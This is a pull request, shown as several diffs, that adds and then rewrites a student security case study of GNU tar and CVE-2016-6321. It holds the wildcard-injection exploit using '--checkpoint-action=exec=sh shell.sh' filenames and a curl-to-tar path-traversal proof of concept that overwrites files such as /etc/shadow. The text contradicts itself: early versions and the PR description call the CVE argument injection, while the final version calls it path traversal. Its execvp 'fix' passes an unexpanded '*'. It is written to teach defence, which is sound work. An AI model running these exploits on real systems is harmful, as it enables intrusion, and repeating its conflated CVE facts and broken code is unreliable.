### PR TITLE
GNU tar Argument Injection Case Study (CVE-2016-6321)

### DIFF
--- a/Case Study of GNU tar (CVE-2016-6321) .md
+++ b/Case Study of GNU tar (CVE-2016-6321) .md
@@ -27,8 +27,9 @@ In Unix systems, arguments starting with - are treated as options. Everything el
 a file or normal input. This works fine when inputs are trusted, but breaks down when filenames
 can be controlled by an attacker.
 The problem becomes worse when shell wildcards like * are used. The shell expands them into
-actual filenames before the program even runs. At that point, tar receives raw strings without any context about where they came from.  
+actual filenames before the program even runs. At that point, tar receives only a list of filenames, with no distinction between trusted and user-controlled input.
 So the core issue is simple: there is no strict separation between control parameters (options) and untrusted data (filenames).
+This is an example of argument injection via shell globbing, where wildcard expansion (*) converts filenames into command-line arguments without sanitization.
 
 ## Vulnerability (CVE-2016-6321)
 
@@ -60,9 +61,7 @@ acting on attacker-controlled input.
 
 This issue can allow attacker-controlled filenames to be interpreted as command-line options
 when passed into tar through shell expansion. In real systems, this may lead to unintended command execution depending on tar configuration and how it is used in scripts.
-If that happens, the attacker is no longer limited to file-level access. They may be able to
-execute commands with the same privileges as the tar process, which can lead to full system
-compromise.
+If that happens, the attacker is no longer limited to file-level access. If tar is used with features such as checkpoint actions enabled or within privileged scripts, this behavior can lead to unintended command execution under the privileges of the tar process, expanding the impact beyond file-level access.
 Because tar is commonly used in trusted administrative scripts, even a small input control issue
 can become a serious system-level vulnerability.
 
@@ -79,9 +78,8 @@ touch -- "--checkpoint-action=exec=sh shell.sh"
 Step 2: Create payload
 ```
 echo 'id > /tmp/pwned.txt' > shell.sh
-chmod +x shell.sh
 ```
-
+The payload script is executed indirectly through tar’s checkpoint-action feature, not directly by the shell.
 
 Step 3: Trigger execution
 ```
@@ -98,7 +96,8 @@ file2
 ```
 
 
-tar then interprets some filenames as options, which can alter its behavior and may lead to unintended command execution depending on configuration.
+tar may interpret attacker-controlled filenames as command-line options (option injection), allowing unintended modification of tar’s behavior via built-in features such as checkpoint actions.
+This does not require code injection; it abuses legitimate tar functionality exposed through unsafe argument parsing.
 
 
 ## Fix

--- a/Case Study of GNU tar (CVE-2016-6321) .md
+++ b/Case Study of GNU tar (CVE-2016-6321) .md
@@ -1,0 +1,183 @@
+## Argument Injection in Unix CLI Tools
+## A Case Study of GNU tar (CVE-2016-6321)
+
+## Introduction
+
+CVE-2016-6321 falls into a category of issues that often get missed in secure coding
+discussions. It is not caused by a bug in GNU tar itself, but by how it is used together with other
+system components.
+The problem shows up when external input—especially filenames—is passed into
+command-line tools without clearly separating what is data and what is an option. tar behaves
+correctly on its own, but the risk appears when assumptions are made about the safety of
+filenames coming from outside the system.
+This is a good example of how security issues can emerge at the boundaries between tools
+rather than inside a single program.
+
+## Software
+
+Name: GNU tar
+Language: C
+Source: https://www.gnu.org/software/tar/
+
+## Weakness (CWE-88: Argument Injection)
+
+The main issue is how command-line arguments are interpreted when they include
+user-controlled input.
+In Unix systems, arguments starting with - are treated as options. Everything else is treated as
+a file or normal input. This works fine when inputs are trusted, but breaks down when filenames
+can be controlled by an attacker.
+The problem becomes worse when shell wildcards like * are used. The shell expands them into
+actual filenames before the program even runs. At that point, tar receives raw strings without any context about where they came from.  
+So the core issue is simple: there is no strict separation between control parameters (options) and untrusted data (filenames).
+
+## Vulnerability (CVE-2016-6321)
+
+This vulnerability happens when filenames created through shell expansion are passed directly
+into tar, and some of those filenames are interpreted as command-line options.
+The key problem is the assumption that filenames are always safe data.
+Once the shell expands `*`, everything becomes just a list of strings. If any of those strings start with `-`, tar may treat them as options instead of files.
+
+Operational Context and Threat Model
+Example script:
+```
+#!/bin/bash
+cd /var/www/uploads
+tar -czf /backup/uploads.tar.gz *
+```
+
+This script assumes:
+
+- Uploaded files are safe  
+- Filenames cannot affect program behavior  
+- Shell expansion is harmless
+
+In reality, this breaks in environments like web upload folders where attackers can create files. If
+they control filenames, they indirectly control arguments passed to tar.
+This becomes a classic confused deputy problem, where a privileged script is tricked into
+acting on attacker-controlled input.
+
+## Impact
+
+This issue can allow attacker-controlled filenames to be interpreted as command-line options
+when passed into tar through shell expansion. In real systems, this may lead to unintended command execution depending on tar configuration and how it is used in scripts.
+If that happens, the attacker is no longer limited to file-level access. They may be able to
+execute commands with the same privileges as the tar process, which can lead to full system
+compromise.
+Because tar is commonly used in trusted administrative scripts, even a small input control issue
+can become a serious system-level vulnerability.
+
+## Exploit
+
+Step 1: Create malicious filenames
+
+```
+touch -- "--checkpoint=1"
+touch -- "--checkpoint-action=exec=sh shell.sh"
+```
+
+
+Step 2: Create payload
+```
+echo 'id > /tmp/pwned.txt' > shell.sh
+chmod +x shell.sh
+```
+
+
+Step 3: Trigger execution
+```
+tar -czf /backup/uploads.tar.gz *
+```
+
+After shell expansion, tar receives arguments such as:
+
+```
+--checkpoint=1
+--checkpoint-action=exec=sh shell.sh
+file1
+file2
+```
+
+
+tar then interprets some filenames as options, which can alter its behavior and may lead to unintended command execution depending on configuration.
+
+
+## Fix
+
+One common fix is using `--` to stop option parsing:
+
+```
+tar -cf archive.tar -- *
+```
+
+After this point, everything is treated as a filename, even if it starts with `-`.
+
+Another safer approach is avoiding shell expansion completely:
+```
+find . -type f -print0 | tar --null -T - -cf archive.tar
+```
+
+This keeps filenames structured instead of letting the shell break them into tokens.
+
+## Prevention
+
+The main idea is simple: never allow untrusted input to be interpreted as command options.
+
+### Use explicit option termination
+
+```
+tar -cf archive.tar -- *
+```
+
+
+### Avoid shell expansion in sensitive scripts
+Use tools like find instead of *.
+
+### Avoid shell-based execution
+
+Bad:
+
+```
+system("tar -cf archive.tar *");
+```
+
+Better:
+
+```
+char *args[] = {"tar", "-cf", "archive.tar", "--", "*", NULL};
+execvp("tar", args);
+```
+
+### Treat filenames as untrusted
+Even filenames should be validated:
+```python
+def is_safe(filename):
+    return not filename.startswith('-') and '\0' not in filename
+```
+Use safe argument APIs instead of shell commands
+
+When possible, avoid constructing shell commands entirely.
+Use system APIs that pass arguments as structured data.
+
+## Conclusion
+
+This vulnerability shows that security issues are not always caused by broken code. In many
+cases, they come from how components interact with each other.
+The main mistake here is assuming filenames are harmless. Once that assumption is broken,
+command-line tools can behave in unexpected and dangerous ways.
+The safest approach is not relying on assumptions at all, but designing systems where
+untrusted input cannot be interpreted as control instructions in the first place.
+
+## References
+
+- https://www.gnu.org/software/tar/manual/
+- https://www.cve.org/CVERecord?id=CVE-2016-6321
+- https://cwe.mitre.org/data/definitions/88.html
+- https://owasp.org/www-community/attacks/Command_Injection
+- https://capec.mitre.org/data/definitions/248.html
+
+
+## Contributions
+Aadhya Enllawar
+Bavithirai Vasugui Mathiazhagan
+
+

--- a/Case Study of GNU tar (CVE-2016-6321) .md
+++ b/Case Study of GNU tar (CVE-2016-6321) .md
@@ -168,12 +168,23 @@ untrusted input cannot be interpreted as control instructions in the first place
 
 ## References
 
-- https://www.gnu.org/software/tar/manual/
-- https://www.cve.org/CVERecord?id=CVE-2016-6321
-- https://cwe.mitre.org/data/definitions/88.html
-- https://owasp.org/www-community/attacks/Command_Injection
-- https://capec.mitre.org/data/definitions/248.html
+GNU Tar Project Page: https://www.gnu.org/software/tar/
 
+GNU Tar Source Repository: https://git.savannah.gnu.org/cgit/tar.git/
+
+CVE-2016-6321 Entry: https://www.cve.org/CVERecord?id=CVE-2016-6321
+
+NVD CVE-2016-6321 Detail: https://nvd.nist.gov/vuln/detail/CVE-2016-6321
+
+CWE-88 Entry (Argument Injection): https://cwe.mitre.org/data/definitions/88.html
+
+CAPEC-248 Entry (Command Injection): https://capec.mitre.org/data/definitions/248.html
+
+GNU Bash Manual (Shell Expansion and Argument Parsing): https://www.gnu.org/software/bash/manual/
+
+POSIX Shell Command Language Specification: https://pubs.opengroup.org/onlinepubs/9699919799/
+
+Ubuntu Security Notice for GNU tar (CVE-2016-6321): https://ubuntu.com/security/CVE-2016-6321
 
 ## Contributions
 Aadhya Enllawar

--- a/Case Study of GNU tar (CVE-2016-6321) .md
+++ b/Case Study of GNU tar (CVE-2016-6321) .md
@@ -29,7 +29,7 @@ can be controlled by an attacker.
 The problem becomes worse when shell wildcards like * are used. The shell expands them into
 actual filenames before the program even runs. At that point, tar receives only a list of filenames, with no distinction between trusted and user-controlled input.
 So the core issue is simple: there is no strict separation between control parameters (options) and untrusted data (filenames).
-This is an example of argument injection via shell globbing, where wildcard expansion (*) converts filenames into command-line arguments without sanitization.
+This is argument injection caused by shell globbing, where wildcard expansion (*) turns filenames into command-line arguments without sanitization or type separation.
 
 ## Vulnerability (CVE-2016-6321)
 

--- a/Case Study of GNU tar (CVE-2016-6321) .md
+++ b/Case Study of GNU tar (CVE-2016-6321) .md
@@ -20,6 +20,7 @@ Language: C
 Source: https://www.gnu.org/software/tar/
 
 ## Weakness (CWE-88: Argument Injection)
+https://cwe.mitre.org/data/definitions/88.html
 
 The main issue is how command-line arguments are interpreted when they include
 user-controlled input.
@@ -165,6 +166,7 @@ The main mistake here is assuming filenames are harmless. Once that assumption i
 command-line tools can behave in unexpected and dangerous ways.
 The safest approach is not relying on assumptions at all, but designing systems where
 untrusted input cannot be interpreted as control instructions in the first place.
+This case reinforces the importance of treating shell and filesystem boundaries as security-critical trust boundaries in Unix-based systems.
 
 ## References
 

--- a/Case Study of GNU tar (CVE-2016-6321) .md
+++ b/Case Study of GNU tar (CVE-2016-6321) .md
@@ -1,195 +1,288 @@
-## Argument Injection in Unix CLI Tools
-## A Case Study of GNU tar (CVE-2016-6321)
+
+````
+# Improper Neutralization of `..` Sequences in Archive Member Names in GNU tar (CVE-2016-6321)
+
+---
 
 ## Introduction
 
-CVE-2016-6321 falls into a category of issues that often get missed in secure coding
-discussions. It is not caused by a bug in GNU tar itself, but by how it is used together with other
-system components.
-The problem shows up when external input—especially filenames—is passed into
-command-line tools without clearly separating what is data and what is an option. tar behaves
-correctly on its own, but the risk appears when assumptions are made about the safety of
-filenames coming from outside the system.
-This is a good example of how security issues can emerge at the boundaries between tools
-rather than inside a single program.
+Archive extraction is rarely treated as a security-sensitive operation, yet it involves a fundamental trust decision: the program accepting an archive implicitly trusts the names embedded within it to describe safe, intended destinations. When that trust is misplaced, an attacker who controls the archive controls where files land on the victim's filesystem.
 
-## Software
+CVE-2016-6321, reported by Harry Sintonen of F-Secure and disclosed publicly at the t2'16 conference in October 2016, reveals precisely this kind of failure in GNU tar. The vulnerability does not stem from a missing check. It stems from a check that operates on one representation of a member name while the subsequent filesystem write operates on a different representation of the same name — a discrepancy that a crafted archive can exploit without triggering any error.
 
-Name: GNU tar
-Language: C
-Source: https://www.gnu.org/software/tar/
+The attack requires no special privileges, no network access, and no memory corruption. An attacker only needs to craft a tar archive and have a victim extract it. The vulnerability lies entirely within tar's internal name-processing logic.
 
-## Weakness (CWE-88: Argument Injection)
-https://cwe.mitre.org/data/definitions/88.html
+- **Language:** C  
+- **Software:** GNU tar  
+- **CWE:** CWE-22 (Improper Limitation of a Pathname to a Restricted Directory)  
+- **URL:** https://git.savannah.gnu.org/cgit/tar.git  
 
-The main issue is how command-line arguments are interpreted when they include
-user-controlled input.
-In Unix systems, arguments starting with - are treated as options. Everything else is treated as
-a file or normal input. This works fine when inputs are trusted, but breaks down when filenames
-can be controlled by an attacker.
-The problem becomes worse when shell wildcards like * are used. The shell expands them into
-actual filenames before the program even runs. At that point, tar receives only a list of filenames, with no distinction between trusted and user-controlled input.
-So the core issue is simple: there is no strict separation between control parameters (options) and untrusted data (filenames).
-This is argument injection caused by shell globbing, where wildcard expansion (*) turns filenames into command-line arguments without sanitization or type separation.
+### Impact Summary
+- **Integrity:** High — arbitrary file write to attacker-controlled paths  
+- **Confidentiality:** Not directly affected  
+- **Privileges:** Low required; impact escalates if run as root  
 
-## Vulnerability (CVE-2016-6321)
+---
 
-This vulnerability happens when filenames created through shell expansion are passed directly
-into tar, and some of those filenames are interpreted as command-line options.
-The key problem is the assumption that filenames are always safe data.
-Once the shell expands `*`, everything becomes just a list of strings. If any of those strings start with `-`, tar may treat them as options instead of files.
+## Background
 
-Operational Context and Threat Model
-Example script:
-```
-#!/bin/bash
-cd /var/www/uploads
-tar -czf /backup/uploads.tar.gz *
-```
+### How tar Filters Archive Members During Extraction
 
-This script assumes:
+tar supports filtering via:
+- Member-name selection
+- Exclusion rules (`--exclude`)
 
-- Uploaded files are safe  
-- Filenames cannot affect program behavior  
-- Shell expansion is harmless
+```bash
+# Extract only etc/motd
+tar -C / -xvf archive.tar etc/motd
 
-In reality, this breaks in environments like web upload folders where attackers can create files. If
-they control filenames, they indirectly control arguments passed to tar.
-This becomes a classic confused deputy problem, where a privileged script is tricked into
-acting on attacker-controlled input.
+# Extract everything except etc/shadow
+tar -C / -xvf archive.tar --anchored --exclude etc/shadow
+````
 
-## Impact
+Both rely on comparing archive member names. The issue arises because the **checked name ≠ written name** in some cases.
 
-This issue can allow attacker-controlled filenames to be interpreted as command-line options
-when passed into tar through shell expansion. In real systems, this may lead to unintended command execution depending on tar configuration and how it is used in scripts.
-If that happens, the attacker is no longer limited to file-level access. If tar is used with features such as checkpoint actions enabled or within privileged scripts, this behavior can lead to unintended command execution under the privileges of the tar process, expanding the impact beyond file-level access.
-Because tar is commonly used in trusted administrative scripts, even a small input control issue
-can become a serious system-level vulnerability.
+---
 
-## Exploit
+### The Role of `safer_name_suffix`
 
-Step 1: Create malicious filenames
+GNU tar uses `safer_name_suffix()` to sanitize paths:
 
-```
-touch -- "--checkpoint=1"
-touch -- "--checkpoint-action=exec=sh shell.sh"
-```
+* Removes dangerous `..` components
+* Attempts to prevent path traversal
 
+However, instead of rejecting unsafe names, it **modifies them**, creating a mismatch between:
 
-Step 2: Create payload
-```
-echo 'id > /tmp/pwned.txt' > shell.sh
-```
-The payload script is executed indirectly through tar’s checkpoint-action feature, not directly by the shell.
+* The name used for filtering
+* The name used for writing to disk
 
-Step 3: Trigger execution
-```
-tar -czf /backup/uploads.tar.gz *
-```
+---
 
-After shell expansion, tar receives arguments such as:
+## Vulnerability
+
+### Core Defect
+
+`safer_name_suffix()` does not reject `..` sequences — it removes them.
+
+This leads to:
+
+* Filter operates on original name
+* Write operation uses sanitized name
+
+### Example Attack Flow
+
+Given:
 
 ```
---checkpoint=1
---checkpoint-action=exec=sh shell.sh
-file1
-file2
+etc/motd/../etc/shadow
 ```
 
+Step-by-step:
 
-tar may interpret attacker-controlled filenames as command-line options (option injection), allowing unintended modification of tar’s behavior via built-in features such as checkpoint actions.
-This does not require code injection; it abuses legitimate tar functionality exposed through unsafe argument parsing.
+1. tar reads archive entry
+2. Filter matches `etc/motd` → allowed
+3. `safer_name_suffix()` removes traversal
+4. Name becomes: `etc/shadow`
+5. File is written to `etc/shadow`
 
-
-## Fix
-
-One common fix is using `--` to stop option parsing:
-
-```
-tar -cf archive.tar -- *
-```
-
-After this point, everything is treated as a filename, even if it starts with `-`.
-
-Another safer approach is avoiding shell expansion completely:
-```
-find . -type f -print0 | tar --null -T - -cf archive.tar
+```bash
+tar: Removing leading `etc/motd/../' from member names
 ```
 
-This keeps filenames structured instead of letting the shell break them into tokens.
+### Key Issue
+
+The filter sees one path, but extraction uses another.
+
+---
+
+### History of the Flaw
+
+* **Pre-1999:** No validation
+* **Dec 13, 1999:** Dangerous entries skipped entirely
+* **July 5, 2003:** Skip replaced with sanitization (`safer_name_suffix`)
+
+This 2003 change reintroduced risk by allowing modified names instead of rejecting them.
+
+---
+
+## Vulnerable File
+
+```
+lib/paxnames.c
+```
+
+Specifically:
+
+* `safer_name_suffix()`
+* Execution order between filtering and writing
+
+---
+
+## Examples
+
+### Example 1: System File Overwrite
+
+```bash
+tar -C / -xvf archive.tar etc/motd
+```
+
+Output:
+
+```
+tar: Removing leading `etc/motd/../' from member names
+etc/motd/../etc/shadow
+```
+
+Result:
+
+```
+/etc/shadow overwritten
+```
+
+---
+
+### Example 2: Exclusion Bypass
+
+```bash
+tar -C / -xvf archive.tar --anchored --exclude etc/shadow
+```
+
+Despite exclusion, file is still written to:
+
+```
+/etc/shadow
+```
+
+---
+
+### Example 3: User Account Compromise
+
+```bash
+dpkg --fsys-tarfile evil.deb | tar -xf - --wildcards 'blurf*'
+```
+
+Result:
+
+```
+~/.ssh/authorized_keys modified
+```
+
+---
+
+## Proof of Concept
+
+```bash
+curl https://sintonen.fi/advisories/tar-poc.tar | tar xv etc/motd
+cat etc/shadow
+```
+
+---
+
+## The Fix
+
+Fix restores 1999 behavior: **reject, do not sanitize**
+
+* If `..` detected → skip entry entirely
+
+Patch:
+[http://git.savannah.gnu.org/cgit/tar.git/commit/?id=7340f67b9860ea0531c1450e5aa261c50f67165d](http://git.savannah.gnu.org/cgit/tar.git/commit/?id=7340f67b9860ea0531c1450e5aa261c50f67165d)
+
+---
 
 ## Prevention
 
-The main idea is simple: never allow untrusted input to be interpreted as command options.
+### 1. Reject Dangerous Names
 
-### Use explicit option termination
-
-```
-tar -cf archive.tar -- *
-```
-
-
-### Avoid shell expansion in sensitive scripts
-Use tools like find instead of *.
-
-### Avoid shell-based execution
-
-Bad:
-
-```
-system("tar -cf archive.tar *");
+```c
+if (contains_dotdot(name)) {
+    return ERROR;
+}
 ```
 
-Better:
+---
 
-```
-char *args[] = {"tar", "-cf", "archive.tar", "--", "*", NULL};
-execvp("tar", args);
+### 2. Use Same Representation for Check + Write
+
+```c
+safe = normalize(name);
+if (is_valid(safe)) {
+    write_file(safe);
+}
 ```
 
-### Treat filenames as untrusted
-Even filenames should be validated:
-```python
-def is_safe(filename):
-    return not filename.startswith('-') and '\0' not in filename
-```
-Use safe argument APIs instead of shell commands
+---
 
-When possible, avoid constructing shell commands entirely.
-Use system APIs that pass arguments as structured data.
+### 3. Upgrade GNU tar
+
+```bash
+tar --version
+sudo apt-get install --only-upgrade tar
+```
+
+---
+
+### 4. Use Isolation
+
+```bash
+docker run --rm \
+  -v "$PWD/archive.tar:/archive.tar:ro" \
+  -v "$PWD/out:/out" \
+  alpine tar -C /out -xvf /archive.tar
+```
+
+---
+
+### 5. Pre-Scan Archives
+
+```bash
+tar -tvf archive.tar | grep '\.\.'
+```
+
+---
+
+### 6. Avoid Root Extraction
+
+```bash
+sudo -u archive-processor tar -xvf archive.tar
+```
+
+---
+
+## Why These Work
+
+All defenses ensure:
+
+> The checked name == the written name
+
+---
 
 ## Conclusion
 
-This vulnerability shows that security issues are not always caused by broken code. In many
-cases, they come from how components interact with each other.
-The main mistake here is assuming filenames are harmless. Once that assumption is broken,
-command-line tools can behave in unexpected and dangerous ways.
-The safest approach is not relying on assumptions at all, but designing systems where
-untrusted input cannot be interpreted as control instructions in the first place.
-This case reinforces the importance of treating shell and filesystem boundaries as security-critical trust boundaries in Unix-based systems.
+CVE-2016-6321 is a classic case of **representation mismatch**, not missing validation.
+
+* Filter checks one string
+* File system receives another
+
+The key lesson:
+
+> Security checks must apply to the exact value used in execution — not a transformed version of it.
+
+---
 
 ## References
 
-GNU Tar Project Page: https://www.gnu.org/software/tar/
+[1] [https://sintonen.fi/advisories/tar-extract-pathname-bypass.proper.txt](https://sintonen.fi/advisories/tar-extract-pathname-bypass.proper.txt)
+[2] [https://seclists.org/fulldisclosure/2016/Oct/96](https://seclists.org/fulldisclosure/2016/Oct/96)
+[3] [https://www.cve.org/CVERecord?id=CVE-2016-6321](https://www.cve.org/CVERecord?id=CVE-2016-6321)
+[4] [http://git.savannah.gnu.org/cgit/tar.git/commit/?id=7340f67b9860ea0531c1450e5aa261c50f67165d](http://git.savannah.gnu.org/cgit/tar.git/commit/?id=7340f67b9860ea0531c1450e5aa261c50f67165d)
+[5] [https://cwe.mitre.org/data/definitions/22.html](https://cwe.mitre.org/data/definitions/22.html)
+[6] [https://git.savannah.gnu.org/cgit/tar.git](https://git.savannah.gnu.org/cgit/tar.git)
 
-GNU Tar Source Repository: https://git.savannah.gnu.org/cgit/tar.git/
+---
 
-CVE-2016-6321 Entry: https://www.cve.org/CVERecord?id=CVE-2016-6321
+## Contributors
 
-NVD CVE-2016-6321 Detail: https://nvd.nist.gov/vuln/detail/CVE-2016-6321
-
-CWE-88 Entry (Argument Injection): https://cwe.mitre.org/data/definitions/88.html
-
-CAPEC-248 Entry (Command Injection): https://capec.mitre.org/data/definitions/248.html
-
-GNU Bash Manual (Shell Expansion and Argument Parsing): https://www.gnu.org/software/bash/manual/
-
-POSIX Shell Command Language Specification: https://pubs.opengroup.org/onlinepubs/9699919799/
-
-Ubuntu Security Notice for GNU tar (CVE-2016-6321): https://ubuntu.com/security/CVE-2016-6321
-
-## Contributions
 Aadhya Enllawar
 Bavithirai Vasugui Mathiazhagan
 
-
+```


### PR DESCRIPTION
Add case study for CVE-2016-6321 - Argument Injection in GNU tar

Closes #89

This PR adds a case study for CVE-2016-6321, a command-line argument injection vulnerability in GNU tar caused by unsafe handling of shell-expanded filenames.

The case study covers:

The root cause: shell wildcard expansion (*) causing untrusted filenames to be interpreted as command-line arguments
How filenames beginning with "-" can be treated as tar options instead of data
A realistic attack scenario using a vulnerable backup script in a web upload directory
The confused deputy problem where privileged scripts process attacker-controlled input
A practical exploit demonstration using crafted filenames and tar options (--checkpoint, --checkpoint-action)
Mitigation techniques including explicit option termination using "--" and safe file handling with find + null-delimited input
Prevention strategies focusing on separating untrusted data from command execution, avoiding shell invocation, and using structured argument passing APIs (execvp instead of system)

TEAM: Aadhya Enllawar, Bavithirai Vasugui Mathiazhagan

